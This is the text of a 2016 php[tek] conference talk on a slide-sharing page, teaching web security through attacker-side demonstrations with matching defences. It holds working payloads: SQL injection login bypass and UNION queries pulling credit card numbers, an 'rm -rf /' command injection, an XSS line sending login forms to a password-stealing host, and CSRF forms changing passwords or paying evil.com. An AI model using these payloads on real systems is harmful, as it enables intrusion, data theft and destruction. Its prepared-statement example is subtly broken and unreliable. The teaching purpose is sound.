PPTX
Lecture 3: Operating Systems Introduction to Computer Hardware Systems
hci7se
 
PDF
SAP S4 Hana Brochure 3 (PTS SYSTEMS AND SOLUTIONS)
pts464036
 
PPTX
Transform Your Business with a Software ERP System
Canada Software Company
 
PDF
System and Network Administration Chapter 2
jaramharo
 
PPTX
VVF-Customer-Presentation2025-Ver1.9.pptx
blackmambaettijean
 
PPTX
Odoo POS Development Services by CandidRoot Solutions
CandidRoot Solutions Private Limited
 
PDF
Wondershare Filmora 15 Crack With Activation Key [2025
ghrom2211g
 
PDF
Odoo Companies in India – Driving Business Transformation.pdf
azhuhardeen1968
 
PDF
Addressing The Cult of Project Management Tools-Why Disconnected Work is Hold...
OnePlan Solutions
 
PDF
AI in Product Development-omnex systems
omnex systems
 
PDF
Claude Code: Everyone is a 10x Developer - A Comprehensive AI-Powered CLI Tool
William Chong
 
PDF
Design an Analysis of Algorithms II-SECS-1021-03
DilanEscobar1
 
PPTX
Introduction to Artificial Intelligence
lohedi9363
 
PDF
System and Network Administraation Chapter 3
jaramharo
 
PDF
Softaken Excel to vCard Converter Software.pdf
markwillsonmw004
 
PDF
EN-Survey-Report-SAP-LeanIX-EA-Insights-2025.pdf
deepakkhaitan3
 
PDF
Design an Analysis of Algorithms I-SECS-1021-03
DilanEscobar1
 
PPTX
history of c programming in notes for students .pptx
Vijayakumari829030
 
Upgrade and Innovation Strategies for SAP ERP Customers
Virendra Rai, PMP
 
Adobe Illustrator 28.6 Crack My Vision of Vector Design
ghrom2211g
 
Lecture 3: Operating Systems Introduction to Computer Hardware Systems
hci7se
 
SAP S4 Hana Brochure 3 (PTS SYSTEMS AND SOLUTIONS)
pts464036
 
Transform Your Business with a Software ERP System
Canada Software Company
 
System and Network Administration Chapter 2
jaramharo
 
VVF-Customer-Presentation2025-Ver1.9.pptx
blackmambaettijean
 
Odoo POS Development Services by CandidRoot Solutions
CandidRoot Solutions Private Limited
 
Wondershare Filmora 15 Crack With Activation Key [2025
ghrom2211g
 
Odoo Companies in India – Driving Business Transformation.pdf
azhuhardeen1968
 
Addressing The Cult of Project Management Tools-Why Disconnected Work is Hold...
OnePlan Solutions
 
AI in Product Development-omnex systems
omnex systems
 
Claude Code: Everyone is a 10x Developer - A Comprehensive AI-Powered CLI Tool
William Chong
 
Design an Analysis of Algorithms II-SECS-1021-03
DilanEscobar1
 
Introduction to Artificial Intelligence
lohedi9363
 
System and Network Administraation Chapter 3
jaramharo
 
Softaken Excel to vCard Converter Software.pdf
markwillsonmw004
 
EN-Survey-Report-SAP-LeanIX-EA-Insights-2025.pdf
deepakkhaitan3
 
Design an Analysis of Algorithms I-SECS-1021-03
DilanEscobar1
 
history of c programming in notes for students .pptx
Vijayakumari829030
 

Hacking Your Way To Better Security - php[tek] 2016

  • 1. Hacking Your Way To Better Security
  • 2. Colin O’Dell @colinodell Lead Web Developer at Unleashed Technologies PHP developer since 2002 league/commonmark maintainer PHP 7 Migration Guide e-book author php[world] 2015 CtF winner
  • 3. Goals Explore several top security vulnerabilities from the perspective of an attacker. 1. Understand how to detect and exploit common vulnerabilities 2. Learn how to protect against those vulnerabilities
  • 4. Disclaimers 1.NEVER test systems that aren’t yours without explicit permission. 2.Examples in this talk are fictional, but the vulnerability behaviors shown are very real.
  • 6. OWASP Top 10 Regular publication by The Open Web Application Security Project Highlights the 10 most-critical web application security risks
  • 9. SQL Injection Modifying SQL statements to: Spoof identity Tamper with data Disclose hidden information
  • 10. SQL Injection Basics $value = $_REQUEST['value']; SELECT * FROM x WHERE y = '[MALICIOUS CODE HERE]' "; $sql = "SELECT * FROM x WHERE y = '$value' "; $database->query($sql);
  • 12. Username Password Log In admin password' Invalid username or password. Please double-check and try again.
  • 14. tail –n 1 /var/log/apache2/error.log MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near "password'" at line 1. tail –n 1 /var/log/mysql/query.log SELECT * FROM users WHERE username = 'admin' AND password = 'password''; $ $
  • 15. tail –n 1 /var/log/apache2/error.log MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near "password'" at line 1. tail –n 1 /var/log/mysql/query.log SELECT * FROM users WHERE username = 'admin' AND password = 'password''; $ $ ~~
  • 18. tail –n 1 /var/log/apache2/error.log MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near "' test" at line 1. tail –n 1 /var/log/mysql/query.log SELECT * FROM users WHERE username = 'admin' AND password = '' test'; $ $
  • 19. tail –n 1 /var/log/apache2/error.log MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near "' test" at line 1. tail –n 1 /var/log/mysql/query.log SELECT * FROM users WHERE username = 'admin' AND password = '' test'; $ $ ~~~~~~~~
  • 20. ~~~~~~~~ SELECT * FROM users WHERE username = 'admin' AND password = '' test'; SELECT * FROM users WHERE username = 'admin' AND password = ''; SELECT * FROM users WHERE username = 'admin' AND password = '' OR (something that is true); SELECT * FROM users WHERE username = 'admin' AND (true); SELECT * FROM users WHERE username = 'admin';
  • 21. SELECT * FROM users WHERE username = 'admin' AND password = '' test '; ' test
  • 22. SELECT * FROM users WHERE username = 'admin' AND password = '' test '; SELECT * FROM users WHERE username = 'admin' AND password = '' test '; ' test ~~~~~~~~~~~~~~~~~~~~
  • 23. SELECT * FROM users WHERE username = 'admin' AND password = ' '; SELECT * FROM users WHERE username = 'admin' AND password = ' ';
  • 24. SELECT * FROM users WHERE username = 'admin' AND password = '' '; SELECT * FROM users WHERE username = 'admin' AND password = '' '; ' ~~~~
  • 25. SELECT * FROM users WHERE username = 'admin' AND password = '' ' '; SELECT * FROM users WHERE username = 'admin' AND password = '' ' '; ' ' ~~~~~~~~~~~~~~~~
  • 26. SELECT * FROM users WHERE username = 'admin' AND password = '' OR ' '; SELECT * FROM users WHERE username = 'admin' AND password = '' OR ' '; ' OR '
  • 27. SELECT * FROM users WHERE username = 'admin' AND password = '' OR '1 ' '; SELECT * FROM users WHERE username = 'admin' AND password = '' OR '1 ' '; ' OR '1 ' ~~~~
  • 28. SELECT * FROM users WHERE username = 'admin' AND password = '' OR '1' ' '; SELECT * FROM users WHERE username = 'admin' AND password = '' OR '1' ' '; ' OR '1' ' ~~~~~~~~~
  • 29. SELECT * FROM users WHERE username = 'admin' AND password = '' OR '1'=' '; SELECT * FROM users WHERE username = 'admin' AND password = '' OR '1'=' '; ' OR '1'='
  • 30. SELECT * FROM users WHERE username = 'admin' AND password = '' OR '1'='1'; SELECT * FROM users WHERE username = 'admin' AND password = '' OR '1'='1'; ' OR '1'='1
  • 31. Username Password Log In admin ' OR '1'='1 Unknown error.
  • 32. Welcome Admin! Admin Menu: Give customer money Take money away Review credit card applications Close accounts
  • 34. Blind SQL Injection Invalid username or password. Please double-check and try again. Unknown error. Valid query (empty result) Invalid query Welcome Admin! Valid query (with result)
  • 35. ' AND (SELECT id FROM user LIMIT 1) = ' Username Password admin Log In Real-Time MySQL View
  • 36. ' AND (SELECT id FROM user LIMIT 1) = ' Username Password admin Unknown error. Log In Error LogQuery Log SELECT * FROM users WHERE username = 'admin' AND password = '' AND (SELECT id FROM user LIMIT 1) = '';
  • 37. ' AND (SELECT id FROM user LIMIT 1) = ' Username Password admin Unknown error. Log In Query Log MySQL error: Unknown table 'user'. Error Log
  • 38. ' AND (SELECT id FROM users LIMIT 1) = ' Username Password admin Unknown error. Log In Query Log MySQL error: Unknown table 'user'. Error Log
  • 39. ' AND (SELECT id FROM users LIMIT 1) = ' Username Password admin Invalid username or password. Please double-check and try again. Log In
  • 40. SQL Injection - Data Disclosure
  • 41. SQL Injection - Data Disclosure http://www.onlinebookstore.com/books/123 SELECT * FROM books WHERE id = 123 $id = 
; $sql = "SELECT title, author, price FROM books WHERE id = " . $id; $data = $database->query($sql); { 'title' => 'The Great Gatsby', 'author' => 'F. Scott Fitzgerald', 'price' => 9.75 }
  • 42. SQL Injection - Data Disclosure http://www.onlinebookstore.com/books/99999 SELECT * FROM books WHERE id = 99999 $id = 
; $sql = "SELECT title, author, price FROM books WHERE id = " . $id; $data = $database->query($sql); { }
  • 43. SQL Injection - Data Disclosure http://www.onlinebookstore.com/books/????? SELECT * FROM books WHERE id = ????? $id = 
; $sql = "SELECT title, author, price FROM books WHERE id = " . $id; $data = $database->query($sql); { 'title' => '', 'author' => '', 'price' => 0.00 }
  • 44. SQL UNION Query Column 1 Column 2 Column 3 The Great Gatsby F. Scott Fitzgerald 9.75 Column 1 Column 2 Column 3 Foo Bar 123 Column 1 Column 2 Column 3 The Great Gatsby F. Scott Fitzgerald 9.75 Foo Bar 123 UNION
  • 45. SQL UNION Query Column 1 Column 2 Column 3 The Great Gatsby F. Scott Fitzgerald 9.75 Column 1 Column 2 Column 3 (SELECT) 1 1 Column 1 Column 2 Column 3 The Great Gatsby F. Scott Fitzgerald 9.75 (SELECT) 1 1 UNION
  • 46. SQL UNION Query Column 1 Column 2 Column 3 (empty) Column 1 Column 2 Column 3 (SELECT) 1 1 Column 1 Column 2 Column 3 (SELECT) 1 1 UNION
  • 47. SQL Injection - Data Disclosure http://www.onlinebookstore.com/books/99999 UNION SELECT number FROM creditcards SELECT * FROM books WHERE id = ????? $id = 
; $sql = "SELECT title, author, price FROM books WHERE id = " . $id; $data = $database->query($sql); { 'title' => '', 'author' => '', 'price' => 0.00 }
  • 48. SQL Injection - Data Disclosure http://www.onlinebookstore.com/books/99999 UNION SELECT number AS 'title', 1 AS 'author', 1 AS 'price' FROM creditcards SELECT * FROM books WHERE id = ????? $id = 
; $sql = "SELECT title, author, price FROM books WHERE id = " . $id; $data = $database->query($sql); { 'title' => '', 'author' => '', 'price' => 0.00 }
  • 49. SQL Injection - Data Disclosure http://www.onlinebookstore.com/books/99999 UNION SELECT number AS 'title', 1 AS 'author', 1 AS 'price' FROM creditcards SELECT * FROM books WHERE id = 99999 UNION SELECT number AS 'title', 1 AS 'author', 1 AS 'price' FROM creditcards $id = 
; $sql = "SELECT title, author, price FROM books WHERE id = " . $id; $data = $database->query($sql); { 'title' => '', 'author' => '', 'price' => 0 }
  • 50. SQL Injection - Data Disclosure http://www.onlinebookstore.com/books/99999 UNION SELECT number AS 'title', 1 AS 'author', 1 AS 'price' FROM creditcards SELECT * FROM books WHERE id = 99999 UNION SELECT number AS 'title', 1 AS 'author', 1 AS 'price' FROM creditcards $id = 
; $sql = "SELECT title, author, price FROM books WHERE id = " . $id; $data = $database->query($sql); { 'title' => '4012-3456-7890-1234', 'author' => 1, 'price' => 1 }
  • 51. Protecting Against SQL Injection $value = $_REQUEST['value']; $sql = "SELECT * FROM x WHERE y = '$value' "; $database->query($sql);
  • 52. Protecting Against SQL Injection Block input with special characters
  • 53. Protecting Against SQL Injection Block input with special characters Escape user input $value = $_REQUEST['value']; $escaped = mysqli_real_escape_string($value); $sql = "SELECT * FROM x WHERE y = '$escaped' "; $database->query($sql); ' OR '1' = '1 ' OR '1' = '1 mysqli_real_escape_string() SELECT * FROM x WHERE y = '' OR '1' = '1'
  • 54. Protecting Against SQL Injection Block input with special characters Escape user input $value = $_REQUEST['value']; $escaped = mysqli_real_escape_string($value); $sql = "SELECT * FROM x WHERE y = '$escaped' "; $database->query($sql); ' OR '1' = '1 ' OR '1' = '1 mysqli_real_escape_string() SELECT * FROM x WHERE y = '' OR '1' = '1'
  • 55. Protecting Against SQL Injection Block input with special characters Escape user input Use prepared statements $mysqli = new mysqli("localhost", "user", "pass", "db"); $q = $mysqli->prepare("SELECT * FROM x WHERE y = '?' "); $q->bind_param(1, $_REQUEST['value']); $q->execute(); Native PHP: ● mysqli ● pdo_mysql Frameworks / Libraries: ● Doctrine ● Eloquent ● Zend_Db
  • 56. Other Types of Injection NoSQL databases OS Commands LDAP Queries SMTP Headers $file = $_GET['filename']; shell_exec("rm uploads/{$file}"); /rm.php?filename=foo.jpg+%26%26+rm+-rf+%2F rm uploads/foo.jpg && rm -rf /
  • 57. XSS Cross-Site Scripting Injecting code into the webpage (for other users) ‱ Execute malicious scripts ‱ Hijack sessions ‱ Install malware ‱ Deface websites
  • 58. XSS Attack Basics $value = $_POST['value']; $value = $rssFeed->first->title; $value = db_fetch('SELECT value FROM table'); <?php echo $value ?> Raw code/script is injected onto a page
  • 59. XSS – Cross-Site Scripting Basics Snipicons by Snip Master licensed under CC BY-NC 3.0. Cookie icon by Daniele De Santis licensed under CC BY 3.0. Hat image from http://www.yourdreamblog.com/wp-content/uploads/2013/04/blackhat.png Logos are copyright of their respective owners. <form id="evilform" action="https://facebook.com/password.php" method="post"> <input type="password" value="hacked123"> </form> <script> document.getElementById('evilform').submit(); </script>
  • 60. XSS – Cross-Site Scripting short.ly Paste a URL here Shorten
  • 61. XSS – Cross-Site Scripting short.ly http://www.colinodell.com Shorten
  • 62. XSS – Cross-Site Scripting short.ly http://www.colinodell.com Shorten Short URL: http://short.ly/b7fe9 Original URL: http://www.colinodell.com
  • 63. XSS – Cross-Site Scripting short.ly Please wait while we redirect you to http://www.colinodell.com
  • 64. XSS – Cross-Site Scripting short.ly <script>alert('hello world!');</script> Shorten
  • 65. XSS – Cross-Site Scripting short.ly <script>alert('hello world!');</script> Shorten Short URL: http://short.ly/3bs8a Original URL: hello world! OK X
  • 66. XSS – Cross-Site Scripting short.ly <script>alert('hello world!');</script> Shorten Short URL: http://short.ly/3bs8a Original URL:
  • 67. <p> Short URL: <a href="
">http://short.ly/3bs8a</a> </p> <p> Original URL: <a href="
"><script>alert('hello world!');</script></a> </p>
  • 68. XSS – Cross-Site Scripting short.ly <iframe src="https://www.youtube.com/embed/dQw4w9WgXcQ"> Shorten
  • 69. XSS – Cross-Site Scripting short.ly <iframe src="https://www.youtube.com/embed/dQw4w9WgXcQ"> Shorten Short URL: http://short.ly/3bs8a Original URL:
  • 70. XSS – Cross-Site Scripting short.ly Please wait while we redirect you to
  • 71. XSS – Cross-Site Scripting document.getElementById('login-form').action = 'http://malicious-site.com/steal-passwords.php';
  • 72. Protecting Against XSS Attacks $value = $_POST['value']; $value = db_fetch('SELECT value FROM table'); $value = $rssFeed->first->title; <?php echo $value ?>
  • 73. Protecting Against XSS Attacks ‱ Filter user input $value = strip_tags($_POST['value']); $value = strip_tags( db_fetch('SELECT value FROM table') ); $value = strip_tags($rssFeed->first->title); <?php echo $value ?>
  • 74. Protecting Against XSS Attacks ‱ Filter user input ‱ Escape user input $value = htmlspecialchars($_POST['value']); $value = htmlspecialchars( db_fetch('SELECT value FROM table') ); $value = htmlspecialchars($rssFeed->first->title); <?php echo $value ?> <script> &lt;script&gt; htmlspecialchars()
  • 75. Protecting Against XSS Attacks ‱ Filter user input ‱ Escape user input ‱ Escape output $value = $_POST['value']; $value = db_fetch('SELECT value FROM table'); $value = $rssFeed->first->title; <?php echo htmlspecialchars($value) ?>
  • 76. Protecting Against XSS Attacks ‱ Filter user input ‱ Escape user input ‱ Escape output {{ some_variable }} {{ some_variable|raw }}
  • 77. CSRF Cross-Site Request Forgery Execute unwanted actions on another site which user is logged in to. ‱ Change password ‱ Transfer funds ‱ Anything the user can do
  • 78. CSRF – Cross-Site Request Forgery Hi Facebook! I am colinodell and my password is *****. Welcome Colin! Here’s your news feed. Snipicons by Snip Master licensed under CC BY-NC 3.0. Cookie icon by Daniele De Santis licensed under CC BY 3.0. Hat image from http://www.yourdreamblog.com/wp-content/uploads/2013/04/blackhat.png Logos are copyright of their respective owners.
  • 79. CSRF – Cross-Site Request Forgery Hi other website! Show me your homepage. Sure, here you go! Snipicons by Snip Master licensed under CC BY-NC 3.0. Cookie icon by Daniele De Santis licensed under CC BY 3.0. Hat image from http://www.yourdreamblog.com/wp-content/uploads/2013/04/blackhat.png Logos are copyright of their respective owners. <form id="evilform" action="https://facebook.com/password.php" method="post"> <input type="password" value="hacked123"> </form> <script> document.getElementById('evilform').submit(); </script>
  • 80. CSRF – Cross-Site Request Forgery <form id="evilform" action="https://facebook.com/password.php" method="post"> <input type="password" value="hacked123"> </form> <script> document.getElementById('evilform').submit(); </script>
  • 81. CSRF – Cross-Site Request Forgery <form id="evilform" action="https://facebook.com/password.php" method="post"> <input type="password" value="hacked123"> </form> <script> document.getElementById('evilform').submit(); </script> Tell Facebook we want to change our password to hacked123 Snipicons by Snip Master licensed under CC BY-NC 3.0. Cookie icon by Daniele De Santis licensed under CC BY 3.0. Hat image from http://www.yourdreamblog.com/wp-content/uploads/2013/04/blackhat.png Logos are copyright of their respective owners.
  • 82. CSRF – Cross-Site Request Forgery <form id="evilform" action="https://facebook.com/password.php" method="post"> <input type="password" value="hacked123"> </form> <script> document.getElementById('evilform').submit(); </script> Hi Facebook! Please change my password to hacked123. Snipicons by Snip Master licensed under CC BY-NC 3.0. Cookie icon by Daniele De Santis licensed under CC BY 3.0. Hat image from http://www.yourdreamblog.com/wp-content/uploads/2013/04/blackhat.png Logos are copyright of their respective owners. Done!
  • 83. CSRF – Cross-Site Request Forgery short.ly <img src="https://paypal.com/pay?email=me@evil.com&amt=9999"> Shorten
  • 84. CSRF – Cross-Site Request Forgery short.ly Please wait while we redirect you to X
  • 86. Protecting Against CSRF Attacks Only use POST requests? NO! POST requests are vulnerable too Common Misconceptions: “<img> tags can only make GET requests” “If a user doesn’t click a form it won’t submit”
  • 87. Protecting Against CSRF Attacks Only use POST requests? Use a secret cookie?
  • 88. Protecting Against CSRF Attacks Only use POST requests? Use a secret cookie? NO! Cookies are sent on every request.
  • 89. Protecting Against CSRF Attacks Only use POST requests? Use a secret cookie? Use random CSRF tokens YES! <input type="hidden" name="token" value="ao3i4yw90sae8rhsdrf"> 1. Generate a random string per user. 2. Store it in their session. 3. Add to form as hidden field. 4. Compare submitted value to session 1. Same token? Proceed. 2. Different/missing? Reject the request.
  • 90. Insecure Direct Object References Access & manipulate objects you shouldn’t have access to
  • 92. Insecure Direct Object References Beverly Cooper
  • 97. Protecting Against Insecure Direct Object References Check permission on data input ‱ URL / route parameters ‱ Form field inputs ‱ Basically anything that’s an ID ‱ If they don’t have permission, show a 403 (or 404) page
  • 98. Protecting Against Insecure Direct Object References Check permission on data input Check permission on data output ‱ Do they have permission to access this object? ‱ Do they have permission to even know this exists? ‱ This is not “security through obscurity”
  • 101. Sensitive Data Exposure - CHANGELOG
  • 102. Sensitive Data Exposure – composer.lock
  • 103. Sensitive Data Exposure – composer.lock
  • 104. Sensitive Data Exposure – .git
  • 105. Sensitive Data Exposure – robots.txt
  • 106. Private information that is stored, transmitted, or backed-up in clear text (or with weak encryption) ‱ Customer information ‱ Credit card numbers ‱ Credentials Sensitive Data Exposure
  • 107. Security Misconfiguration & Components with Known Vulnerabilities Default accounts enabled; weak passwords ‱ admin / admin Security configuration ‱ Does SSH grant root access? ‱ Are weak encryption keys used? Out-of-date software ‱ Old versions with known issues ‱ Are the versions exposed? ‱ Unused software running (DROWN attack)
  • 108. Components with Known Vulnerabilities
  • 109. Components with Known Vulnerabilities
  • 110. Components with Known Vulnerabilities
  • 111. Protecting Against Sensitive Data Exposure, Security Mismanagement, and Components with Known Vulnerabilities Keep software up-to-date ‱ Install critical updates immediately ‱ Install other updates regularly
  • 112. Protecting Against Sensitive Data Exposure, Security Misconfiguration, and Components with Known Vulnerabilities Keep software up-to-date Keep sensitive data out of web root ‱ Files which provide version numbers ‱ README, CHANGELOG, .git, composer.lock ‱ Database credentials & API keys ‱ Encryption keys
  • 113. Protecting Against Sensitive Data Exposure, Security Misconfiguration, and Components with Known Vulnerabilities Keep software up-to-date Keep sensitive data out of web root Use strong encryption ‱ Encrypt with a strong private key ‱ Encrypt backups and data-in-transit ‱ Use strong hashing techniques for passwords
  • 114. Protecting Against Sensitive Data Exposure, Security Mismanagement, and Components with Known Vulnerabilities Keep software up-to-date Keep sensitive data out of web root Use strong encryption Test your systems ‱ Scan your systems with automated tools ‱ Test critical components yourself ‱ Automated tests ‱ Manual tests
  • 115. Next Steps Test your own applications for vulnerabilities Learn more about security & ethical hacking Enter security competitions (like CtF) Stay informed
  • 117. Thanks! Slides & feedback: https://joind.in/talk/f7516 Colin O'Dell @colinodell